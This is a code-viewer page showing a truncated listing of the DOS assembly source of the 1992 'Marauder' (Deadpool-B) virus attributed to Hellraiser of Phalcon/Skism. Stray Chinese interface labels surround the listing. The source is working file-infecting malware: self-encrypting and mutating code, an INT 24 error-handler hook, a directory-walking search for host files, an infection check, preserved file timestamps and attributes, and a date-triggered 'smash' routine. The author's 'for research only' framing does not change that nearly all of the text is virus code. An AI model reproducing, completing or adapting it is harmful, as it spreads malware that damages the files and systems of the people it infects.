?? marauder.asm
字號:
; "Marauder" Virus
; AKA Deadpool-B
;
; By Hellraiser
; Of Phalcon/Skism
;
; For virus reseach only
;
; I always wanted to release this source, so here it is. Now that it's been caught
; take a look at whats inside.
;
; I know it's no great thing, but it's good to learn from. It contains basic
; encryption, mutation, and INT 24 handling.
;
; I will be very upset if I see 100 new versions of this code with some lame kids
; name in place of mine. So just use it to learn from, it's very straight foward.
code segment 'code'
assume cs:code, ds:code, ss:code, es:code
org 0100h
dta EQU endcode + 10
headlength EQU headend - headstart
bodylength EQU bodyend - bodystart
encryptpart EQU bodyend - mixed_up
part1size EQU part2 - part1
part2size EQU parta - part2
partasize EQU partb - parta
partbsize EQU dude - partb
mutants EQU chris - part1
total_mutant EQU mutants / 2
encryptlength EQU encryptpart / 2
virus_size EQU headlength + bodylength + 5 ; head + body + int24 + 2
drive EQU endcode + 110
backslash EQU endcode + 111
orig_path EQU endcode + 113
dirdta EQU orig_path + 66
myid EQU 88h
toolarge EQU 65535 - virus_size
fileattr EQU 21
filetime EQU 22
filedate EQU 24
filename EQU 30
headstart:
jmp bodystart
db myid
headend:
realprogramstart:
db 90h, 90h, 90h
db 0cdh, 020h, 1ah, 1ah
realprogramend:
bodystart:
call deadpool
deadpool:
pop si
sub si,offset deadpool
call encrypt
jmp chris
enc_code dw 0000h
encrypt proc near
assume cs:code, ds:code, es:code, ss:code
part1_:
push ax
push bx
push cx
push dx
mov cx, encryptlength
mov bp, si
add si, offset bodyend
mov di,si
std
xor_loop:
lodsw
xor ax, [bp + enc_code]
stosw
loop xor_loop
done_:
mov si, bp
pop dx
pop cx
pop bx
pop ax
ret
;nop
encrypt endp
infect proc near
call encrypt
int 21h
call encrypt
ret
infect endp
mixed_up:
part1:
push dx
push cx
push bx
push ax
mov cx, encryptlength
mov bp, si
add si, offset mixed_up
mov di,si
cld
part2:
mov si, bp
pop ax
pop bx
pop cx
pop dx
parta:
mov bp, si
add si, offset endcode
mov di, si
push ax
push bx
push cx
push dx
mov cx, encryptlength
std
partb:
pop dx
pop cx
pop bx
pop ax
mov si, bp
dude:
; don't get any ideas lamer
hellraiser label byte
idbuffer db 0cdh, 20h,' [Marauder] 1992 Hellraiser - Phalcon/Skism. '
stringsize EQU ($ - hellraiser)
chris:
push es
mov ax,3524h
int 21h
mov [si + word ptr oint24], bx
mov [si + word ptr oint24 + 2], es
pop es
mov ax, 2524h
lea dx, [si + newint24]
int 21h
push si
mov ah, 47h
xor dl,dl
add si, offset orig_path
int 21h
pop si
mov ah,19h
int 21h
add al, 41h
mov byte ptr [si + offset drive], al
mov ax, '\:'
mov word ptr [si + offset backslash], ax
;mov byte ptr [si + offset defaultdrive], al
; here's my new tri-dimensional jmp displacement theory in play
push si
pop bp
lea si, [bp + offset oldjmp]
lea di, [bp + offset thisjmp]
mov cx,04h
cld
rep movsb
push bp
pop si
why:
mov ah,1ah
lea dx,[si + dta]
int 21h
mov ah,2ah
int 21h
cmp dx, 0202h
jne ff
jmp smash
ff:
mov ah,4eh
lea dx,[si + filespec]
mov cx, 07h
searchloop:
int 21h
jnc here
;jmp up
mov ah,1ah
lea dx,[si + dirdta]
int 21h
mov ah,3bh
lea dx,[si + offset rootdir]
int 21h
jc at_root
jmp why
at_root:
cmp byte ptr [si + donebefore], 01h
je notokey
mov al,01h
mov [si + donebefore], al
mov ah,4eh
xor cx,cx
mov cl,13h
lea dx, [si + dwildcards]
ffdloop:
int 21h
jnc okey
jmp far ptr nofilesfound
notokey:
mov ah,4fh
jmp ffdloop
okey:
mov ah,3bh
lea dx, [si + offset dirdta + filename]
int 21h
jc notokey
jmp why
here:
mov bx, word ptr [si + offset dta + fileattr]
mov word ptr [si + origattr], bx
mov ax,4301h
xor cx,cx
lea dx, [si + offset dta + filename]
int 21h
jc bad_file2
call openfile
jc bad_file2
mov word ptr [si + offset handle], ax
mov bx, word ptr [si + offset dta + filedate]
mov word ptr [si + origdate], bx
mov bx, word ptr [si + offset dta + filetime]
mov word ptr [si + origtime], bx
xchg bx, ax
mov ah, 3fh
mov cx, 4
lea dx, [si + oldjmp]
int 21h
cmp byte ptr [si + offset oldjmp + 3], myid
jne sick_of_it_all
bad_file:
mov ax,4301h
mov cx, word ptr [si + offset origattr]
lea dx, [si + offset dta + filename]
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -